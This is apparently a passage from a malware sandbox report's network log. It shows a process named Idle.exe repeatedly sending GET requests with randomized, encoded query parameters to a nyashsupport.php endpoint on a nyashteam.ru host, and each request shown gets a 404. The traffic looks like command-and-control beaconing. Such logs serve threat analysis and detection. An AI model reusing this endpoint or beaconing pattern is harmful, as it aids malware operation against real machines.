Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:01:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebPIXvWRtINMNVSZnayvjBzd98KXkJlcpszZzu0azgNzOJNGKAmluNXvf8P9ANSjf5CXOL8jTK88a6mUW%2BUsCUCG%2Bo5sQxe%2BKdk%2FE3yRQrR3YScbnJ0e8tzgEwLMA2u1dZU6GLete2VgYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e5c55f6dbec8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47213&min_rtt=47213&rtt_var=23606&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=483&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:01:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWu1aBpuA14nrPW2CiU1ZyFy%2FF9cxzsbUE00wd4qXKJlNK0xsY0LSB7%2FSdpkhKYpU1fpI%2FOKBsmAsQSS7rC9LJpaaLXU6lRD%2BjSNmdYkw%2Bk6f%2FJ%2FmLtql7YQmLk8fJqS1%2B3DZc%2B4Sgqsxw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e5c678adbec8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47265&min_rtt=47213&rtt_var=17809&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1032&recv_bytes=942&delivery_rate=56979&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:02:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpazfeqoAkjHoW1yA8cxc7jBTbiM6GeQZeqtMCwA%2FLbpnCzM4vtS6Q4t2keV1norJ8QLJcaYgeywMI4l340LRZ1CtbhjhnbMaRfkLcD2eif24ig8idLhLajCyargMT%2F7D6tOCHT93WUrLw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e62f58f2cd0e-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=47326&min_rtt=47326&rtt_var=23663&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=571&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&GljkUVpzpaF2iWzNKs0=NYy3BGlG6m&wqrxl8v9eX=Xi2TipjmLA2p&rxpiOui3DISL=iNOZtW42APBrh6gTaR4AVGyTMut HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:02:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXVzQJqZN%2FyCK3YiFsshTJ1x1%2BLAbhzXYjSlT4g0WATiqhG22nqgzlVmvaO0Mrpf3v31o5vnwT4ptJBwsmsaea94Q5LOpkYL0ws%2B9bz3Hwsg4e8qrwI20U57sJzw1ofWIigyw9cLNx%2Fu8g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e6306a14cd0e-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=47323&min_rtt=47251&rtt_var=17752&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1025&recv_bytes=1118&delivery_rate=57372&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:02:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NfjQ6cuL7W9WZ23OvICezeBXmUQ8z%2FPbfYJ5%2BMFxgFd2uPB3D1wA6G0VM%2BwFLoODR%2F75EiX09QS4titYQAp4kMlnSq0YoldzHTNBVntsFNi4zDj0APQKjonN80bnAblG8Lj5Upy9K97mw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e692ca3193e1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47607&min_rtt=47607&rtt_var=23803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=630&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&Z87Ce6=nyUjnxhJsGl3ZZpodRiPMLr5jsWCe&P6odryWxYzFHQ21Vgt=Tdv6rsbHY94aeoK0oO6s0Sq2&JE5yDOMnRLEeA7uPq7xdYkc=BNGk HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:02:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6kVJDqmGa4fn1GyMLUFHj9HHg1COcn%2BKfaaBUuav0gLhpfnrxag9%2B6ml2hPwy8gJlZekKnbjbMuIynnF%2F7XaYPR%2BuGJXaH2v971KNTJRdWEVjM%2B%2Boj1qZ1foLMhnz8xC%2FlBnrEy11FTctw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e693eb8a93e1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47846&min_rtt=47607&rtt_var=18331&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1032&recv_bytes=1236&delivery_rate=54806&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:02:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPdYiRi%2BQ41UG33sdPzkO%2FO%2BwRFFqM8C6gsm2Cue2Rn9W39rLB9QugLIhVOSpReSFU6549sPbB7G8OK6yKDqfc7PEHRe5%2FstcwiQMpEeH8dUr40xUWpekOp46U5TnwlfqKyvTSaHvPjkQg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e7054b394141-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=48561&min_rtt=48561&rtt_var=24280&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=645&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&To4Yy28g1SsTPOz05e5hcN=Sq0bGmVw7mN0mInz5Gr53B7e&WgnKoWOF3mr8a14fg=rCYNsRo9avR1QsW6uFsmSP9v&g61fOxaWQQcHJyVfo5cxBV9=dHyx3cbCmeLVweL81eAc HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:02:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mxWab3FGUkqYNvkK9d1Lb985VBvY8cFyAPbAWfUg1qwDzyX3LptYxVzwH1mV%2FLm%2B4BtUwqgzYPl2KbaurKFSW0LiM4N0Jp4dsBjM%2BwdjjYf4roVh1sZOerK7K7Jau4WIDNXyj5Rd8jDbwA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e7068cc74141-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=48715&min_rtt=48561&rtt_var=18519&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1029&recv_bytes=1266&delivery_rate=54503&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:03:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktwWKtjnO6dCmjlNPiy3GaGcAeFOVWH1%2FqlsDPfDfkKaS%2FCOBRn1iYJdCevo6jPyyqI7Zf2zcei9kFh6P7SqhSXhzi%2B6fPPDdR8UlAtURqCq%2BVDq0mtiGJuQkMKKeL%2BXdBBXN0TmpGNXew%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e7524ecf6337-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47645&min_rtt=47645&rtt_var=23822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=571&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&ZZqocC=oXYpd4dPOcdCMSn6GsbsXeB76KR&ifG6H4Xpi=fZA7j&b8e1vck6ATdKV=sSmOrtVg4R47Y8M HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:03:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3%2F4G9Nuolj3Td%2B4tOf%2BDvl6TwW8Fn3pRg5C8DT7vCpqtRpizlMI7%2BlmBQlOXFsc6%2FmkWRuOpZ9fa1lQDMZD%2Brx9E7g3QizEEWZyesYcfrddEVkupmTARPjOCD8xEJBUTWQ7OU2%2FeYuVuw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e75348556337-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47627&min_rtt=47404&rtt_var=17901&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1034&recv_bytes=1118&delivery_rate=57128&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94

http

Idle.exe

1.5kB
2.4kB
7
8

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG

http

Idle.exe

1.4kB
2.4kB
7
8

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG

HTTP Response

404
104.21.2.8:80

